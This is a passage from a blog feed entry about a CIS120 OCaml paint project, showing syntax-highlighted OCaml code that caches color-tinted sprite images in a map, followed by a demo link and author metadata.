<p>Every time* we just check whether the map have the color we want. If no, then <code class="language-plaintext highlighter-rouge">make_image</code> with the new offset and store it into the map; otherwise just use the cached image. Now, we have the flawless, aesthetic :heart:<em>chromajivelization</em>.</p>

<h3 id="implementation">Implementation</h3>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">module</span> <span class="nc">IntMap</span> <span class="o">=</span> <span class="nn">Map</span><span class="p">.</span><span class="nc">Make</span><span class="p">(</span><span class="k">struct</span> <span class="k">type</span> <span class="n">t</span> <span class="o">=</span> <span class="kt">int</span> <span class="k">let</span> <span class="n">compare</span> <span class="o">=</span> <span class="n">compare</span> <span class="k">end</span><span class="p">)</span>
<span class="k">let</span> <span class="n">rajiv_image</span> <span class="o">=</span> <span class="n">ref</span> <span class="nn">IntMap</span><span class="p">.</span><span class="n">empty</span>

<span class="k">let</span> <span class="n">draw_rajiv</span> <span class="p">(</span><span class="n">g</span><span class="o">:</span> <span class="n">gctx</span><span class="p">)</span> <span class="p">(</span><span class="n">cd</span><span class="o">:</span> <span class="n">color</span><span class="p">)</span> <span class="p">(</span><span class="n">p</span><span class="o">:</span> <span class="n">position</span><span class="p">)</span> <span class="o">:</span> <span class="kt">unit</span> <span class="o">=</span>
  <span class="k">let</span> <span class="p">(</span><span class="n">x</span><span class="o">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">=</span> <span class="n">ocaml_coords</span> <span class="n">g</span> <span class="n">p</span> <span class="k">in</span>
  <span class="k">let</span> <span class="n">c'</span> <span class="o">=</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">cd</span><span class="o">.</span><span class="n">r</span> <span class="n">cd</span><span class="o">.</span><span class="n">g</span> <span class="n">cd</span><span class="o">.</span><span class="n">b</span> <span class="k">in</span>
  <span class="k">if</span> <span class="n">not</span> <span class="p">(</span><span class="nn">IntMap</span><span class="p">.</span><span class="n">mem</span> <span class="n">c'</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">)</span> <span class="k">then</span>
    <span class="n">rajiv_image</span> <span class="o">:=</span> <span class="nn">IntMap</span><span class="p">.</span><span class="n">add</span> <span class="n">c'</span> <span class="p">(</span><span class="nn">Graphics</span><span class="p">.</span><span class="n">make_image</span> <span class="p">(</span><span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
      <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">l</span> <span class="o">-&gt;</span>
        <span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
           <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">c</span> <span class="o">-&gt;</span> 
             <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
             <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">transp</span>
             <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span>
               <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="p">((</span><span class="n">r'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
                            <span class="p">((</span><span class="n">g'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">g</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
                            <span class="p">((</span><span class="n">b'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">b</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
           <span class="p">)</span> <span class="n">l</span>
        <span class="p">)</span>
      <span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
    <span class="p">)))</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">;</span>
  <span class="nn">Graphics</span><span class="p">.</span><span class="n">draw_image</span> <span class="p">(</span><span class="nn">IntMap</span><span class="p">.</span><span class="n">find</span> <span class="n">c'</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">)</span> <span class="n">x</span> <span class="n">y</span>
</code></pre></div></div>

<h1 id="demo">Demo</h1>

<h3 id="paint"><a href="/cis120-paint">Paint!</a></h3>

<p>I prefer not to publish my source code on this one. However, I managed to port the Paint JS file locally and did some alteration. Now it runs on a single page without annoying pop-up. You are free to try it out and comment down below, or ask any questions via email.</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="CIS" /><category term="CIS120" /><category term="OCaml" /><category term="Coding" /><category term="GUI" /><summary type="html"><![CDATA[GUI in OCaml? This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.]]></summary></entry></feed>